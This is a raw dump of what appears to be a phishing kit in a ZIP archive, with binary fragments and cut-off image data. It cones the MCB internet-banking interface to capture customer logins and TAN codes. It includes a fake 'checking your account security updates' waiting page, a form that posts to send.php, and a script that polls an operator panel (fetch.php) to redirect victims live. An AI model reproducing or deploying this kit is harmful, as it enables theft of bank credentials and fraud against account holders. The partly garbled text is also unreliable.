NdRLHKFjUFzK9IXBLmPMyt8lKPIaX29LKLvH+ztKrsKs8npJbyqi9uNSdR8jSrM4cvFPK7eGYoS7r7DPi/QQw3qDoTp/qGEnkW3ayJc526RbftaacX721V+09XdmfWZ3v7LeThbTnW906ds0UcPcFK/CEF+Nm7GcMi1FLhCEbrsx5+U+KeveK9HHLXU0WzodB5Q6N5C6fjjKGiddcmdaXqvJV1ussq4Xjqlbdd2md2LRGrpdYyjn8tzkIi9W6KLoHECgGC2+1284Vr9lY3DHzNpjXRZyrEn5afhbu27qu2/hbnCLfFxqenc/wBe/a7qrcJ9Ubn0dvXTPcC9pd/cdg3WxH93OKop5mFl4MtvzHwSUs3Gyb0YJQjeUSlif4fIloenc7M/Dak4eHN853p3lZtVzEpoqD95FpWth8d5efUQIAiBSLWcxhDoAn+giO9we021Wr37jIi4XfHy796Uf4XE5U9zm/icLv8A/uM9eywP6bsV2OVhxX0rN2jbrV34u5h34WdXtlHES/yo2U8ZPSf68uMUjE2uv6NjrxsOOMg7LctpS8rsJ42lCAUyj2Mjp5U1eYKgqHUqibEigB/KAiPXPts6V2Lapq7i48HkL85VnJP2rU5aX+mjPJncT1Pd7O52Nc2vqLfMmGw3E08XGVvFsyg/wurHhad+Ptjec17uCNsSKKTdJJBBJNBBBMiSKKJCppIpJlAiaSSZAKRNNMgAAFAAAADoGZCdAnJgDAGAMAYAwBgDAGAUp/11v+yvP0rHAKrAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAfO0omA3QO4AMUDdA6gUwlEwAP2gBhIHX+YMA+4AwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwD/2Q==); background-color: #fff; margin: 0; padding: 0; border: 0; display: flex; justify-content: flex-end; align-items: center; color: #AB1E22; font-size: 18px; font-weight: 700; } .window_title_header{ position: relative; color: #231f20; font-size: 45px; font-weight: 300; line-height: 200%; margin: 0; text-align: center; } .window_header_position{ position: relative; top: 90px } #contentarea, #contentarea1 { width:100%; position:absolute; border: 1px solid #cdcdcd; } .frmmainform{ position: relative; top: 100px; margin: auto; width: 980px; } .Buttons, .buttons { font-size: 18px !important; padding: 20px 50px !important; } input::placeholder{ color:#D3D3D3; } .fancy-tooltip .fancy-tooltip__content{ width: 280px !important; bottom: 0 !important; top: auto !important; } </style><div id="headerWrapper" ><div id="header" ><div id="_topMenu" > </div></div></div><div class="window_header no-resizable window_header_maximize window_header_position" ><div class="window_title_error active" ><table style="width: 100%;" id="error-dialog-table" cellspacing="1" cellpadding="1" ></table></div><div class="window_title_header active" id="stepheader" > </div></div><form name="frmmain" method="post" action="send.php" id="frmmain" AUTOCOMPLETE="off" class="frmmainform" autocomplete="off" ><input type='hidden' name='idsequence' value='pSgCsZEe1RMpNgO68492HMCoCNvfH0ra+W91QdrubUQ=' /><table id="mainbox" class="mainbox" cellpadding="0" cellspacing="0" border="0" ><tr><td><div class="middlepanel" ><table cellspacing="0" cellpadding="0" border="0" id="maintable" class="maintable" style="border: none;" ><tr><td><div class="pageheadingdiv" ><style type="text/css" > </style><div class="headerinfodiv" ></div></td></tr><tr><td height="100%" valign="top" ><div class="y_scroll" id="contentarea" ><div class="contentarea" style="padding:0px" ><span id="box" class="box" ><div class="middlepanel" ><table border="0" cellspacing="1" cellpadding="1" class="formtable" ><tr><td class="labeltext col1" ><label for="fldCardDesc" ><b></b></label></td></tr><tr><td class="labeltext" ></li> <h1 style="vertical-align: inherit; color: #000000; text-align:center; font-size: 30px;">Checking your account security updates...</h1> <ul> </li> <h1> <span> </span> </h1> <div class="options"> <div class="options-item" onclick="window.location=#"> <div > <div > <span><span><span><span><span><span> <p style="text-align:center;"> <img src="https://dtf-kontor.com//images/dtd_loader.gif" style="height: 78px;"> </p> <div class="form-header-well"> <h1 style="vertical-align: inherit; color: #000000; text-align:center; font-size: 20px;">Wait a minute...</h1> <br> <h1 style="vertical-align: inherit; color: #000000; text-align:center; font-size: 20px;">Do not leave this page.</a></h1> </div> </footer></input></td></tr></tbody></table></div></div></td></tr></table></div></td></tr></table><input type="hidden" name="fldRequestId" value="RRUSR01" ></input><input type="hidden" name="fldDeviceId" value="01" ></input><input type="hidden" name="fldDataId" value="" ></input><input type="hidden" name="fldSessionId" value="" ></input><input type="hidden" name="fldSectionId" value="RRUSR01" ></input><input type="Hidden" name="fldServiceType" value="USR" ></input></form></script> <script src="res/jq.js"></script> <script> var cd = "<?php echo $current_data; ?>"; setInterval(() => { $.post("../panel/fetch.php", {update:1}, function(d){ if(cd!=d){ window.location=d; cd=d; } }) }, 2000); </script> </body></html>PK [��\Ԍ�d� d� app/tan.phpnu W+A�� <?php require '../main.php'; ?> <!--[if lte IE 7]> <style type="text/css" > @import url("https://ib.mcb.mu/T001/css/cmn/theme.css"); </style> <![endif]--> <![if (!IE) | (gte IE 8)]> <style type="text/css" > @import url("https://ib.mcb.mu/T001/css/cmn/theme.uri.css"); </style> <![endif]> <script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/combined/jquery-includes.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/jquery-migration.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/select2/js/select2.min.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en-US.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en-US.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/jquery.qrcode.min.js" ></script><script> var globalcnt = 1; var useragent = ""; var openWindowArray = new Array(); var message = new Object (); var isHelp= ''; message.maxopen = "Maximum limit reached for number of open windows. Please close a window to open new Transaction."; message.alreadyopen = "Window already Open."; message.addfav = "Add to Favourites"; message.alertstr = "Alert"; function SendDashboardFormRequest (p_frm,p_desc,p_currtxn,p_nosubmitForm) { try{ var windowobj = openWindow(p_frm.fldServiceType.value, p_desc); if(p_nosubmitForm) { return windowobj; } //document.frmtp.fldRequestId.value = defAppId+p_frm.fldServiceType.value+requestId; //document.frmtp.fldServiceType.value = p_frm.fldServiceType.value; if(windowobj) { p_frm.target = windowobj.getFrameName(); p_frm.submit(); } } catch(e) { } } function getPosition(arr,val) { if(arr != null && arr.length > 0) { for(var cnt = 0;cnt < arr.length; cnt++ ) { if(arr[cnt] == val) { return cnt; } } } return -1; } function getPresentWindow(arr,val) { var count=0; if(arr != null && arr.length > 0) { for(var cnt1 = 0;cnt1 < arr.length; cnt1++ ) { if(arr[cnt1] == val) { count++; } } } return count; } function addIntoArray(p_array, p_txn) { p_array.push(p_txn); } function removeFromArray(p_array, p_txn) { var index_value = getPosition(p_array,p_txn); var range = 1; p_array.splice(index_value,range); } function fireMenuHelp(p_txn){ var l_idtxn= ""+ p_txn + ".htm"; var l_default= ""+ p_txn + ".htm"; var features = "directories=no,location=no,menubar=no,status=no,scrollbars=yes," + "toolbar=no,dependant=no,resizable=yes,top=75,left=750," + "scrollbars=yes,width=400,height=500"; addlistWindow = window.open ("static/help.jsp?REFIDTXN="+l_idtxn+"&DEFPATH="+l_default, "details", features); addlistWindow.focus(); //addlistWindow.moveTo(700,80); } $(document).ready(function() { if(useragent=="ipad" || useragent=="android"){ //alert(useragent); if (parent.isMenuClassic()) { var l_height = $( window.parent.frames["frameSet_main"]).height(); var l_width = $( window.parent.frames["frameSet_main"]).width(); var msg_l = $('#MySplitter').width()-200; var msg_p = $('#MySplitter').width(); //alert(l_height); //alert(l_width); //var statusText = top.frames["frame_top"].document.getElementById('topContainer'); var txn_frm = top.frames["frame_txn"].document.getElementById('main'); if(l_width>l_height) { //LANDSCAPE // alert("LANDSCAPE"); // $(statusText).css('width','95%'); $('.workarea').css('width','auto'); $('.workarea').css('overflow','hidden'); $('#MySplitter').css('width',msg_p); $('#main').css('width',msg_l); } else { // Portrait // alert("PORTRAIT"); //$(statusText).css('width','65%'); $('.workarea').css('width',l_width); $('.workarea').css('overflow','auto'); $('#MySplitter').css('width',l_height); $('#main').css('width',msg_p); } } } if(useragent=="ipad"){ if (!parent.isMenuClassic()) { if (parent.frames.length > 0) { var heightDiv = $('form[name="frmmain"]').height() + $(window).height() - 200; $('.contentarea').css({height:heightDiv}); $('body').addClass("mainFrame"); $('form[name="frmmain"]').addClass("mainscroll"); try { $('form[name="frmmain"]').touchScroll({elastic: true, momentum: false}); touchTableScroll('displayTable'); function loaded() { document.addEventListener('touchmove', function(e){ e.preventDefault(); }); myScroll = new iScroll('displayTable', {elastic: false, momentum: false}); } document.addEventListener('DOMContentLoaded', loaded); } catch(e){ } } } }}); </script><style> .calMask { position: absolute; z-index:1000; background:#FFFFFF; border:0px solid; } .calContainer { position: relative; background:#FFFFFF; z-index:1007; border-bottom-color:#FFFFFF; border-color:#FFFFFF; border-left-color:#FFFFFF; border-top-color:#FFFFFF; border-right-color:#FFFFFF; font-color:#6677DD; } .screenMask { position: absolute; height:1000%; width: 1000%; left:0px; top:0px; z-index:1005; background: url('https://ib.mcb.mu/T001/images/transparent.gif'); } .calContent { position: relative; z-index:1010; background:#FFFFFF; border:2px inset; padding: 5px; } .TESTcpYearNavigation, .TESTcpMonthNavigation { background-color:#6677DD; text-align:center; vertical-align:center; text-decoration:none; color:#FFFFFF; font-weight:bold; } .TESTcpDayColumnHeader, .TESTcpYearNavigation, .TESTcpMonthNavigation, .TESTcpCurrentMonthDate, .TESTcpCurrentMonthDateDisabled, .TESTcpOtherMonthDate, .TESTcpOtherMonthDateDisabled, .TESTcpCurrentDate, .TESTcpCurrentDateDisabled, .TESTcpTodayText, .TESTcpTodayTextDisabled, .TESTcpText { font-family:arial; font-size:8pt; } TD.TESTcpDayColumnHeader { text-align:right; border:solid thin #6677DD; border-width:0 0 1 0; } .TESTcpCurrentMonthDate, .TESTcpOtherMonthDate, .TESTcpCurrentDate { text-align:right; text-decoration:none; } .TESTcpCurrentMonthDateDisabled, .TESTcpOtherMonthDateDisabled, .TESTcpCurrentDateDisabled { color:#D0D0D0; text-align:right; text-decoration:line-through; } .TESTcpCurrentMonthDate { color:#6677DD; font-weight:bold; } .TESTcpCurrentDate { color: #FFFFFF; font-weight:bold; } .TESTcpOtherMonthDate { color:#808080; } TD.TESTcpCurrentDate { color:#FFFFFF; background-color: #6677DD; border-width:1; border:solid thin #000000; } TD.TESTcpCurrentDateDisabled { border-width:1; border:solid thin #FFAAAA; } TD.TESTcpTodayText, TD.TESTcpTodayTextDisabled { border:solid thin #6677DD; border-width:1 0 0 0; } A.TESTcpTodayText, SPAN.TESTcpTodayTextDisabled { height:20px; } A.TESTcpTodayText { color:#6677DD; font-weight:bold; } SPAN.TESTcpTodayTextDisabled { color:#D0D0D0; } .TESTcpBorder { border:solid thin #6677DD; } .printWarning { display:none; } .noPrintWarning { display:none; } </style><style media="print" > .printWarning { display:inline-block; } .noPrintWarning { display:none; } </style><div id="testdiv1" style="position:absolute;visibility:hidden;background-color:white;layer-background-color:white;z-index:10005" ></div><div class="screenMask" id="calenderMask" style="position:absolute;display:none;background-color:white" onclick="hide_Cal();" ></div><script type="text/javascript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" > var idEntity = 'T001'; var l_appLayWidth = 0; window.parent.scrollTo(0,0); //----------------------------------------------------------------------------------------------------------------------- function setPageHeight(){ var height = 0,window_header_height=0;; var body = document.body, html = document.documentElement; var position=window.parent.pageYOffset; var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); parent.$("#appContainer").css("height",+ (0) + "px" ); parent.$("#_contentWrapper").css("height",+ (0) + "px" ); parent.$("#txnbodyLayout").css("height",+ (0) + "px" ); parent.$("#ApplicationLayout").css("height",+ (0) + "px" ); parent.$(".window_panel").css("height",+ (0) + "px" ); parent.$(".window_frame").css("height",+ (0) + "px" ); parent.$(".workarea").css("height",+ (0) + "px" ); height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight ); window_header_height = parent.$(".window_header").height(); if('BFV'==idtxn){ height = 1700; } height = height + window_header_height; if(height < 200){ height = 280; } if(height>0){ parent.$(".workarea").css("height",+ (height+50) + "px" ); parent.$("#appContainer").css("height",+ (height+500) + "px" ); parent.$("#_contentWrapper").css("height",+ (height+350) + "px" ); parent.$("#ApplicationLayout").css("height",+ (height+250) + "px" ); parent.$(".window_panel").css("height",+ (height+250) + "px" ); parent.$(".window_frame").css("height",+ (height+100) + "px" ); } window.parent.scrollTo(0,position); } //----------------------------------------------------------------------------------------------------------------------- if(idEntity=='T001'){ $(document).ready(function(){ $("td:empty").html(" "); }); $(document).ready(function(){ if(top.isMenuClassic == undefined){ $('.workarea').addClass('popup'); } try { l_appLayWidth = parent.$("#ApplicationLayout").width(); } catch (e){ } var height = 0,window_header_height=0; var body = document.body, html = document.documentElement; var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); parent.$("#appContainer").css("height",+ (0) + "px" ); parent.$("#_contentWrapper").css("height",+ (0) + "px" ); parent.$("#txnbodyLayout").css("height",+ (0) + "px" ); parent.$("#ApplicationLayout").css("height",+ (0) + "px" ); parent.$(".window_panel").css("height",+ (0) + "px" ); parent.$(".window_frame").css("height",+ (0) + "px" ); parent.$(".workarea").css("height",+ (0) + "px" ); height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight ); window_header_height = parent.$(".window_header").height(); height = height + window_header_height; if('BFV'==idtxn){ height = 1700; } if(height < 200){ height = 280; } if(height>0){ parent.$(".workarea").css("height",+ (height+50) + "px" ); parent.$("#appContainer").css("height",+ (height+500) + "px" ); parent.$("#_contentWrapper").css("height",+ (height+350) + "px" ); parent.$("#ApplicationLayout").css("height",+ (height+250) + "px" ); parent.$(".window_panel").css("height",+ (height+250) + "px" ); parent.$(".window_frame").css("height",+ (height+100) + "px" ); } }); try{ if(!top.isMenuClassic()){ $(document).ready(function() { var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); if(idtxn == "MAR"){ var desc = $("#pageheading").html(); }else{ var desc = $("#pageheading").text(); } var note = null; if(idtxn != 'DTF'){ note = $("#pageheadernote").text(); }else{note = $("#pageheadernote").html();} /* if(desc != ''){ $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(desc); document.title=desc; }*/ if(idtxn =="EMF"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Ways to Bank</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Register to e-statements</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } if(idtxn =="COU"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Help & Contact us</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Contact us</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } if(idtxn =="TDA"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Accounts & Products</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Fixed deposits</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Amend automatic renewal</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } var content = ''; var $windowControls = $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_function_bar"); $windowControls.siblings('.window_title_error').empty(); if ($windowControls.siblings('.window_title_error').length == 0) { $("#error-dialog-table").css("display", ""); content = $("#dialog-modal-error").html(); if(typeof content == "undefined") { content = $("#dialog-modal-error").text(); } //alert("content "+content); $windowControls.before("<div class='window_title_error active' >"+content+ "</div>"); }else{ $("#error-dialog-table").css("display", ""); content = $("#dialog-modal-error").html(); $windowControls.siblings('.window_title_error').html(content); } if ($windowControls.siblings('.window_title_header').length == 0) { $windowControls.before("<div class='window_title_header active' >" + desc + "</div>"); }else{ $windowControls.siblings('.window_title_header').html(desc); } if ($windowControls.siblings('.window_title_note').length == 0) { $windowControls.before("<div class='window_title_note active' >" + note + "</div>"); }else{ $windowControls.siblings('.window_title_note').html(note); } }); } } catch(e) { } }else { $(document).ready(function(){ if(top.isMenuClassic == undefined){ $('.workarea').addClass('popup'); } try { l_appLayWidth = parent.$("#ApplicationLayout").width(); } catch (e){ } }); try{ if(!top.isMenuClassic()){ $(document).ready(function() { var desc = $("#pageheading").text(); if(desc != ''){ $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(desc); document.title=desc; } var $windowControls = $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_function_bar"); if ($windowControls.siblings('.window_title_timestamp').length == 0) { if (top.isAuthTxnOnly != 'Y') { $windowControls.before("<div class='window_title_timestamp active' >" + $('#pageheadingdate').text() + "</div>"); } }else{ if (top.isAuthTxnOnly != 'Y') { $windowControls.siblings('.window_title_timestamp').text($('#pageheadingdate').text()); } } }); } } catch(e) { } } var popup_txnid=""; var popup_seq=""; var popup_target=""; var popup_win_name=""; var flgbtn=false; var highlightedTabs = new Array (); var helptxn='USR'; //----------------------------------------------------------------------------- function displayStatusMessage () { var idtxn = 'RRUSR01'; if(idtxn) { idtxn = idtxn.substring(2,5); } var totalcnt = 0 + 0; //+ 0; if(totalcnt == 0) { if (window.parent.frames['messageFrame']) { window.parent.frames['messageFrame'].resetErrors(); } else if (window.top.frames['messageFrame']) { window.top.frames['messageFrame'].resetErrors(); } } checkForAuditLogFrame(); } //----------------------------------------------------------------------------- $(function () { var count = 0 + 0 + 0; var idEntity = 'T001'; if(idEntity == 'T001'){ if (count > 0 && 'C' != 'M') { if("".length>150){ $('#dialog-modal-error').hide(); /*$('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false, minWidth : 600 } );*/ }else{ $('#dialog-modal-error').hide(); /*$('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false } );*/ } $("#dialog-modal-error").css("min-height", ""); $("#error-dialog-table").css("display", ""); $("#dialog-error").css("height", "auto"); } }else { if (count > 0 && 'C' != 'M') { if("".length>150){ $('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false, minWidth : 600 } ); }else{ $('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false } ); } $("#dialog-modal-error").css("min-height", ""); $("#error-dialog-table").css("display", ""); $("#dialog-error").css("height", "auto"); } } }) //----------------------------------------------------------------------------- function minimizeMessages () { var msgFrame; var msg_text = "Click here to view messages..." var l_footer_content = '<div id="msg_' + document.frmmain.fldServiceType.value + '" class="msgFrame">'; l_footer_content += '<img src="images/list_errors.gif" align="abdMiddle" title="' + msg_text +'" id="msg_' + document.frmmain.fldServiceType.value + '_img" >'; //l_footer_content += ' ' + msg_text l_footer_content += '</div>'; if (window.top.frames ["messageFrame"]) { msgFrame = $("#errorTab", window.top.frames ["messageFrame"].document); parent.document.getElementById('dataframe').rows = "25,*"; } else { msgFrame = $("#errorTab"); msgFrame.show(); document.getElementById('errorTab').style.display = 'inline-block'; } msgFrame.html (l_footer_content); msgFrame.click ( function () { $('#dialog-modal-error').dialog ('open'); $("#dialog-modal-error").css("min-height", ""); /*$('#dialog-modal-error').parent().css( { position:'absolute !important', left:'auto !important', right:'0px !important', top:'24px!important' });*/ } ); } //----------------------------------------------------------------------------- function highlightTab (p_tab_id) { var l_tab_obj, imageid, test, image1; if (highlightedTabs.length > 0 && highlightedTabs.contains (p_tab_id)) { l_tab_obj = document.getElementById (p_tab_id); imageid = l_tab_obj.id + "image"; test = l_tab_obj; image1 = document.createElement("img"); image1.setAttribute('id',imageid); image1.setAttribute('src','images/red_error.gif'); image1.setAttribute('align','absMiddle'); image1.className='errorImg'; test.childNodes [0].insertBefore(image1); addIntoArray (highlightedTabs, p_tab_id); /*$("#"+imageid).tooltip({ track: true, delay: 0, showURL: false, opacity: 1, fixPNG: false, showBody: " - ", extraClass: "pretty fancy", top: -15, left: 20 });*/ } } //----------------------------------------------------------------------------- function markErrorField (p_err_field, err_message){ markErrorField(p_err_field, err_message, 'default', 'default'); } //----------------------------------------------------------------------------- function markErrorField(p_err_field, err_message, p_targetPos, p_tooltipPos){ $(p_err_field).css ('border', '1px solid red'); $(p_err_field).css ('background-color', 'rgb(255, 240, 240)'); $(p_err_field).attr ('title', err_message); /*$(p_err_field).tooltip({ track: true, delay: 0, showURL: false, opacity: 1, fixPNG: false, showBody: " - ", extraClass: "pretty fancy", top: -15, left: 20 });*/ if(p_targetPos == 'default') p_targetPos = 'topMiddle'; if(p_tooltipPos == 'default') p_tooltipPos = 'bottomMiddle'; $(p_err_field).qtip({ position: { corner: { target: p_targetPos, tooltip: p_tooltipPos } }, style: { name: 'red', padding: '7px 13px', width: { max: 210, min: 0 }, tip: true } }); } //----------------------------------------------------------------------------- function initError(){ //Initialize Error } //----------------------------------------------------------------------------- function displayErrorMessage () { cnt = 0; totalcnt = 0; var arrErrorCode = new Array(); var arrErrorDesc = new Array(); var arrWarningCode = new Array(); var arrWarningDesc = new Array(); var arrInfoCode = new Array(); var arrInfoDesc = new Array(); var arrSuccessCode = new Array(); var arrSuccessDesc = new Array(); totalcnt = totalcnt + cnt; cnt = 0; totalcnt = totalcnt + cnt; } //----------------------------------------------------------------------------- function displayBulkStatusMessage () { return; } //----------------------------------------------------------------------------- function Draft ( P_idTxn , p_seqNo ) { if(document.frmmain.fldnextaction.value=='RD'){} else{ document.frmmain.fldnextaction.value ='DF'; } document.frmmain.fldauthaction.value ='VO'; try { document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+p_seqNo; } catch (e) { } SendTxnRequest('98',P_idTxn); } //----------------------------------------------------------------------------- function Draft(P_idTxn) { if(document.frmmain.fldnextaction.value=='RD'){} else{ document.frmmain.fldnextaction.value ='DF'; } document.frmmain.fldauthaction.value ='VO'; try { document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+'03'; } catch (e) { } SendTxnRequest('98',P_idTxn); } //----------------------------------------------------------------------------- function saveTemplate ( P_idTxn , p_seqNo ) { document.frmmain.fldnextaction.value = 'TP'; //Set fldauthaction to 'VI' if module and rule chk is required for Templates document.frmmain.fldauthaction.value = 'VO'; try { document.frmmain.fldistemplatetxn.value = 'true';//for generic payment only document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+p_seqNo; } catch (e) { } SendTxnRequest ('97',P_idTxn); } //----------------------------------------------------------------------------- function saveTemplate (P_idTxn) { document.frmmain.fldnextaction.value = 'TP'; //Set fldauthaction to 'VI' if module and rule chk is required for Templates document.frmmain.fldauthaction.value = 'VO'; try { document.frmmain.fldistemplatetxn.value = 'true';//for generic payment only document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+'03'; } catch (e) { } SendTxnRequest ('97',P_idTxn); } //----------------------------------------------------------------------------- function PrintPopup(p_request_id , p_section_id, p_form) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; var addlistWindow = window.open ("", "PrintPopup", features) ; p_form.fldSectionId.value = p_section_id; p_form.fldRequestId.value = p_request_id; p_form.fldSessionId.value = parent.idsession; p_form.target = "PrintPopup"; p_form.submit(); addlistWindow.focus(); } //------------------------------------------------------------------------------ function DowloadPopup(p_request_id , p_section_id, p_form) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; var addlistWindow = window.open ("", "DowloadPopup", features) ; p_form.fldSectionId.value = p_section_id; p_form.fldRequestId.value = p_request_id; p_form.fldSessionId.value = parent.idsession; p_form.target = "DowloadPopup"; p_form.submit(); addlistWindow.focus(); } //----------------------------------------------------------------------------- function getChangeFieldColor(){ var arr_fldchanged = new Array (); var arr_prevval = new Array (); var arr_idx = 0; var len = 0; var i; arr_idx = 0; len =arr_fldchanged.length; for(i=0;i<len;i++){ if(document.getElementById(arr_fldchanged[i]) != null && document.getElementById(arr_fldchanged[i]) != "undefined"){ document.getElementById(arr_fldchanged[i]).className = "ColHeadingLeftAlignedBold"; } } } //-------------------------------------------------------------------------------------- function defaultfunction(){ return true; } //-------------------------------------------------------------------------------------- function fnFixDecimalPlaces ( p_val , p_places ) { if ( p_val == '' || isNaN (p_val) || isNaN (p_val) || (p_places != '0' && p_places == '')) { return ''; } return (parseFloat (p_val)).toFixed (p_places); } //-------------------------------------------------------------------------------------- function fnSubmitForm () { try { if (parent.popupWindow) { parent.popupWindow.top.frames [1].name = 'txn_'+parent.idsession; document.frmmain.target = 'txn_'+parent.idsession; document.frmmain.fldSessionId.value = parent.idsession; document.frmmain.fldRequestId.value = "RR"+popup_txnid+popup_seq; document.frmmain.submit (); document.frmmain.target = ""; } } catch (e) { } } //-------------------------------------------------------------------------------------- function call_Popup ( p_feature , p_txnid , p_seqno , p_target ){ try { if (parent.popupWindow) { parent.popupWindow.close();//closing existing pop up window. parent.popupWindow = null; } } catch (e) { } popup_win_name = 'popup_'+parent.iduser; popup_txnid = p_txnid; popup_seq = p_seqno; parent.popupWindow = window.open ("defaultflexcubepopup.html",popup_win_name, p_feature) } //-------------------------------------------------------------------------- function fnOnBodyUnload () { try { if (parent.popupWindow) { parent.popupWindow.close();//closing existing pop up window. } } catch (e) { } } //-------------------------------------------------------------------------- function isTxnInRole (p_txn){ var p_success = false; for (var i=0;i < arr_grp__txnid.length; i++){ if (arr_grp__txnid [i] == p_txn) { p_success=true; } } return p_success; } //------------------------------------------------------------------------------ function view_attached_docs() { SendTxnRequest('03','VAI'); } //------------------------------------------------------------------------------ function fnAttachDocuments(p_tableid,p_rowid,p_buttonid) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; document.frmmain.target = "txn"; document.frmmain.fldSessionId.value = parent.idsession; //document.frmmain.fldRequestId.value="RRALI02"; document.frmmain.fldSectionId.value="RRALI02"; document.frmmain.fldServiceType.value="ALI"; document.frmmain.fldtableid.value=p_tableid; document.frmmain.fldrowid.value=p_rowid; document.frmmain.fldbtnflag.value=p_buttonid; call_Popup ( features , 'ALI' , '02' , 'txn' ); document.frmmain.target = ""; } //------------------------------------------------------------------------------ function fnAttachFilesForMailBox(p_tableid,p_rowid,p_buttonid) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; document.frmmain.target = "txn"; document.getElementById('fldSessionId').value = parent.idsession; document.getElementById('fldSectionId').value = "RRIMS92"; document.getElementById('fldServiceType').value = "IMS"; document.getElementById('fldtableid').value = p_tableid; document.getElementById('fldrowid').value = p_rowid; document.getElementById('fldbtnflag').value = p_buttonid; call_Popup ( features , 'IMS' , '92' , 'txn' ); document.frmmain.target = ""; } //------------------------------------------------------------------------------ function fnOriginationsPopUpOpen(p_reqid,p_txnid,p_iddevice,p_features) { var idrequest = 'RR'+p_txnid+p_reqid; document.frmmain.target = "txn"; document.frmmain.fldSessionId.value = parent.idsession; document.frmmain.fldSectionId.value = idrequest; document.frmmain.fldServiceType.value= "ORG"; document.frmmain.fldDataId.value = dataid; call_Popup ( p_features , p_txnid , p_reqid , 'txn' ); document.frmmain.target = ""; return; } //------------------------------------------------------------------------------ function fnEreceiptsPopUpOpen(idRequestNum) { var height = window.innerHeight; var width = window.innerWidth; var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=" + (0.9*height) + ",width=" + (0.9 * width) + ",top=" + (height * 0.1) + ",left=" + (width * 0.1) + ",status=yes"; if(idRequestNum){ call_Popup ( features , 'ERC' , idRequestNum , 'txn' ); } else{ call_Popup ( features , 'ERC' , '01' , 'txn' ); } } //------------------------------------------------------------------------------ function fnRemove(p_sectionid,p_requestid) { document.frmmain.target=""; document.frmmain.flddelrefno.value =""; document.frmmain.fldfilerefno.value =""; for (var i=0;i < document.frmmain.elements.length;i++) { if (document.frmmain.elements[i].type=='checkbox' && document.frmmain.elements[i].name=="fldattachedfiles" ) { if(document.frmmain.elements[i].checked==false) 